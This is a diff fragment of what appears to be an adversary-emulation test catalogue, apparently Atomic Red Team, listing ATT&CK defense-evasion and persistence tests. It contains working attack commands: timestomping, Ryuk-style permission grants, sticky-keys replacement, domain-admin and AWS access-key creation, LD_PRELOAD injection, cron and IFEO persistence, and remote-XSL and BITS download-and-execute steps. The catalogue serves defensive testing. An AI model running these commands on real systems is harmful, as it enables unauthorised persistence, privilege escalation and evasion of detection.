/tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -37292,10 +37292,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -37314,10 +37314,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh T1036.006: technique: @@ -37371,7 +37371,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename -' + ' supported_platforms: - macos executor: @@ -37383,7 +37383,7 @@ defense-evasion: auto_generated_guid: b95ce2eb-a093-4cd8-938d-5258cef656ea description: 'Space after filename. -' + ' supported_platforms: - macos - linux @@ -37605,7 +37605,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -37619,7 +37619,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37634,7 +37634,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -37744,7 +37744,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -37754,7 +37754,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -37771,7 +37771,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -37781,7 +37781,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -38036,7 +38036,7 @@ defense-evasion: executor: command: 'start #{docx_file} -' + ' name: command_prompt T1055.003: technique: @@ -38279,7 +38279,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38291,13 +38291,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file -' + ' supported_platforms: - linux - macos @@ -38309,7 +38309,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -38355,7 +38355,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} -' + ' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -38378,10 +38378,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38389,10 +38389,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 @@ -38415,10 +38415,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38426,10 +38426,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -38452,10 +38452,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -38463,10 +38463,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 @@ -38484,25 +38484,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" -' + ' - description: 'kxwn.lock must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File -' + ' executor: command: | import-module #{file_path}\timestomp.ps1 @@ -39476,10 +39476,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) -' + ' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -39487,7 +39487,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r -' + ' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -39510,10 +39510,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -39521,7 +39521,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F -' + ' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 @@ -39539,10 +39539,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -39552,7 +39552,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s -' + ' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c @@ -39575,7 +39575,7 @@ defense-evasion: attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt cleanup_command: 'del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1 -' + ' name: command_prompt - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 @@ -39600,18 +39600,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) -' + ' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 -' + ' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1220: @@ -39725,37 +39725,37 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) -' + ' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) -' + ' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 @@ -39783,26 +39783,26 @@ defense-evasion: dependencies: - description: 'msxsl.exe must exist on disk at specified location (#{msxsl_exe}) -' + ' prereq_command: 'if (Test-Path #{msxsl_exe}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://web.archive.org/web/20200803205229if_/https://download.microsoft.com/download/f/2/6/f263ac46-1fe9-4ae9-8fd3-21102100ebf5/msxsl.exe" -OutFile "#{msxsl_exe}" -' + ' executor: command: "#{msxsl_exe} #{xmlfile} #{xslfile}\n" cleanup_command: 'del -Path #{msxsl_exe} >nul 2>&1 -' + ' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. -' + ' supported_platforms: - windows input_arguments: @@ -39818,17 +39818,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) -' + ' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction Ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" -' + ' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -39836,7 +39836,7 @@ defense-evasion: payload. Open Calculator.exe when test successfully executed, while AV turned off. -' + ' supported_platforms: - windows input_arguments: @@ -39851,7 +39851,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" -' + ' name: command_prompt persistence: T1546.008: @@ -39945,7 +39945,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -39953,7 +39953,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -39987,7 +39987,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -39998,7 +39998,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1098: @@ -40075,7 +40075,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name -' + ' supported_platforms: - windows executor: @@ -40141,7 +40141,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory -' + ' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -40164,14 +40164,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False -' + ' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss -' + ' supported_platforms: - iaas:aws input_arguments: @@ -40183,14 +40183,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test -' + ' executor: command: | aws iam create-group --group-name #{username} @@ -40404,7 +40404,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" -' + ' T1098.001: technique: external_references: @@ -40511,14 +40511,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40591,14 +40591,14 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -40642,7 +40642,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised -' + ' supported_platforms: - iaas:aws input_arguments: @@ -40653,14 +40653,14 @@ persistence: dependencies: - description: 'Check if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic -' + ' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds @@ -40855,11 +40855,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -40868,11 +40868,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -40880,10 +40880,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} -' + ' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1546.011: @@ -40991,31 +40991,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll -' + ' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} -' + ' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -41108,7 +41108,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: @@ -41124,30 +41124,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -41244,7 +41244,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -41428,10 +41428,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} -' + ' cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -41455,10 +41455,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} -' + ' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore -' + ' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -41496,7 +41496,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 -' + ' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 @@ -41528,10 +41528,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr -' + ' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >nul 2>&1 -' + ' name: command_prompt T1547: technique: @@ -41856,7 +41856,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds -' + ' supported_platforms: - linux - windows @@ -41876,7 +41876,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. -' + ' supported_platforms: - windows - macos @@ -41996,7 +41996,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42041,7 +42041,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42079,7 +42079,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -42196,10 +42196,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} -' + ' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} -' + ' name: command_prompt elevation_required: true T1136.003: @@ -42269,7 +42269,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time -' + ' supported_platforms: - iaas:aws input_arguments: @@ -42280,21 +42280,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured -' + ' prereq_command: 'cat ~/.aws/credentials | grep "default" -' + ' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure -' + ' executor: command: 'aws iam create-user --user-name #{username} -' + ' cleanup_command: 'aws iam delete-user --user-name #{username} -' + ' name: sh elevation_required: false T1078.004: @@ -42360,7 +42360,7 @@ persistence: description: 'GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. -' + ' supported_platforms: - google-workspace - windows @@ -42395,20 +42395,20 @@ persistence: cleanup_command: 'gcloud iam service-accounts delete #{service-account-email} --quiet -' + ' dependency_executor_name: gcloud dependencies: - description: 'Requires gcloud -' + ' prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" -' + ' T1542.002: technique: created: '2019-12-19T20:21:21.669Z' @@ -42645,7 +42645,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -42656,17 +42656,17 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob @@ -42678,7 +42678,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -42689,20 +42689,20 @@ persistence: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1136: @@ -42884,7 +42884,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -42904,7 +42904,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -42912,7 +42912,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -42944,7 +42944,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -42961,10 +42961,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 @@ -43139,10 +43139,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) -' + ' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -43150,7 +43150,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 -' + ' name: command_prompt T1078.001: technique: @@ -43270,7 +43270,7 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default -' + ' supported_platforms: - windows input_arguments: @@ -43281,10 +43281,10 @@ persistence: executor: command: 'net user #{guest_user} /active:yes -' + ' cleanup_command: 'net user #{guest_user} /active:no -' + ' name: command_prompt elevation_required: true T1136.002: @@ -43336,7 +43336,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -43358,14 +43358,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. -' + ' supported_platforms: - windows input_arguments: @@ -43380,10 +43380,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain -' + ' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain -' + ' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell @@ -43391,7 +43391,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User -' + ' supported_platforms: - windows input_arguments: @@ -43420,7 +43420,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" -' + ' name: powershell elevation_required: false T1078.002: @@ -43783,21 +43783,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' -' + ' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload -' + ' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -43822,18 +43822,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) -' + ' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} -' + ' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls -' + ' name: bash T1546.014: technique: @@ -43894,7 +43894,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 -' + ' supported_platforms: - macos input_arguments: @@ -44183,7 +44183,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list -' + ' supported_platforms: - windows input_arguments: @@ -44196,12 +44196,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" -' + ' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed -' + ' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -44421,7 +44421,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings -' + ' supported_platforms: - windows input_arguments: @@ -44437,19 +44437,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" -' + ' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 -' + ' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 